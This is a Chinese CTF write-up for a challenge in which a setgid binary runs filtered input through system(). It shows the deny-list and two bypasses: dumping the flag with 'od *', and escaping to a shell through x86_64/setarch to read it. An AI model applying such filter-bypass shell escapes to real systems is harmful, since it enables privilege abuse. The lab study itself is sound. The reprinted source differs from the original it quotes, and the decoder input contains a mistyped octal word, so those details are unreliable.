[BJDCTF 2nd] test

ssh -p 26619 [email protected]

连接服务器
没有读取flag的权限
看下test.c

#include 
#include 
#include 

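int main(){
    /* One command line read from stdin and handed to system(). */
    char cmd[0x100] = {0};
    /* Characters that may not appear anywhere in the command. The original
     * tested each one with its own strstr() call; for single-character
     * needles that chain is exactly one strpbrk() over the same set. */
    static const char denied[] = "nepbushiflag|/$`-<>.";

    puts("Welcome to Pwn-Game by TaQini.");
    puts("Your ID:");
    system("id");
    printf("$ ");
    /* fgets() is bounded by sizeof cmd; gets() has no bound, so a line longer
     * than 0x100 bytes overran the stack buffer. EOF before any input now
     * exits instead of running system("") on the empty buffer. */
    if (fgets(cmd, sizeof cmd, stdin) == NULL) {
        exit(0);
    }
    /* fgets() keeps the trailing newline that gets() used to strip. */
    cmd[strcspn(cmd, "\n")] = '\0';
    if (strpbrk(cmd, denied) != NULL) {
        exit(0);
    }
    /* A character deny-list only narrows which program names reach system();
     * it is not a privilege boundary, so the process's credentials still
     * decide what the command may read. */
    system(cmd);
    return 0;
}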

提取下过滤的字符

import re

a = '''    if( strstr(cmd, "n")
       ||strstr(cmd, "e")
       ||strstr(cmd, "p")
       ||strstr(cmd, "b")
       ||strstr(cmd, "u")
       ||strstr(cmd, "s")
       ||strstr(cmd, "h")
       ||strstr(cmd, "i")
       ||strstr(cmd, "f")
       ||strstr(cmd, "l")
       ||strstr(cmd, "a")
       ||strstr(cmd, "g")
       ||strstr(cmd, "|")
       ||strstr(cmd, "/")
       ||strstr(cmd, "$")
       ||strstr(cmd, "`")
       ||strstr(cmd, "-")
       ||strstr(cmd, "<")
       ||strstr(cmd, ">")
       ||strstr(cmd, ".")){'''

# Every double-quoted needle in the strstr() chain is one denied character;
# list them "|"-separated for a quick look at the deny-list.
_needle = re.compile(r'"(.*?)"')
denied_chars = _needle.findall(a)
print("|".join(denied_chars))

过滤了（注意下面输出中的 `|||` 是分隔符夹着被过滤的 `|` 本身）

n|e|p|b|u|s|h|i|f|l|a|g|||/|$|`|-|<|>|.

去掉特殊字符，用 grep 过滤一下，看看还有哪些命令可以用

ctf@3c6d7673903c:~$ ls /usr/bin/ /bin/ | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g"
dd
kmod
mt
mv
rm

2to3
2to3-2.7
2to3-3.4
[
comm
od
tr
tty
w
wc
x86_64
xxd
ctf@3c6d7673903c:~$ 

还有 od 和 x86_64 两个命令可以使用
题目的预期解是:
运行 test 后它会让用户输入一个命令，此时进程的 egid 是 ctf_pwn，拥有读取 flag 的权限

ctf@3c6d7673903c:~$ ./test 
Welcome to Pwn-Game by TaQini.
Your ID:
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ od *
0000000 066146 063541 030573 062062 034060 031066 026462 032461
0000020 061145 032055 061142 026461 032541 060543 061055 034470
0000040 033463 061464 063061 031545 076544 077412 046105 001106
0000060 000401 000000 000000 000000 000000 001000 037000 000400

这里输出的八进制字符串就是 flag（od 默认每两个字节为一组、按小端序打印，所以解码时每组要把字节顺序倒过来）
写脚本翻译一下

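def decode_od_words(words: str) -> bytes:
    """Turn default ``od`` output words back into the file's bytes.

    ``od`` with no format option prints each 2-byte unit as a 6-digit octal
    number in the machine's byte order (little-endian here, which is why the
    original script reversed every decoded pair). Each word becomes two
    little-endian bytes. Leading zeros are preserved; the former
    ``hex()``/``unhexlify`` round-trip lost them, so a word such as
    ``000401`` produced an odd-length hex string and was silently dropped.

    Args:
        words: whitespace-separated octal words, e.g. ``"066146 063541"``.

    Returns:
        The reconstructed bytes in file order; empty input gives ``b""``.

    Raises:
        ValueError: a word is not valid octal.
        OverflowError: a word does not fit in 16 bits.
    """
    return b"".join(int(w, 8).to_bytes(2, "little") for w in words.split())


tmp = "066146 063541 030573 062062 034060 031266 026462 032461 061145 032055 061142 026461 032541 060543 061055 034470 033463 061464 063061 031545 076544 077412 046105 001106 000401"
# The dump continues into the ELF header after the flag; non-text bytes are
# shown as U+FFFD instead of being skipped, so nothing is dropped silently.
print(decode_od_words(tmp).decode("utf-8", errors="replace"), end="")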

得到flag

flag{12d08622-15eb-4bb1-a5ca-b89374c1fe3d}

非预期解:
使用x86_64

ctf@3c6d7673903c:~$ ./test 
Welcome to Pwn-Game by TaQini.
Your ID:
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ x86_64
$ id
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ cat flag
flag{12d08622-15eb-4bb1-a5ca-b89374c1fe3d}
$ 

研究一下这玩意到底是啥

root@kali:~/guidang/BJD# which x86_64
/usr/bin/x86_64
root@kali:~/guidang/BJD# ls -l /usr/bin/x86_64
lrwxrwxrwx 1 root root 7 7月  28  2019 /usr/bin/x86_64 -> setarch

大概用途如下:

The execution domains currently only affect the output of uname -m. For example, on an AMD64 system, running `setarch i386 program` will cause program to see i686 instead of x86_64 as the machine type. It also allows setting various personality options. The default program is /bin/sh.
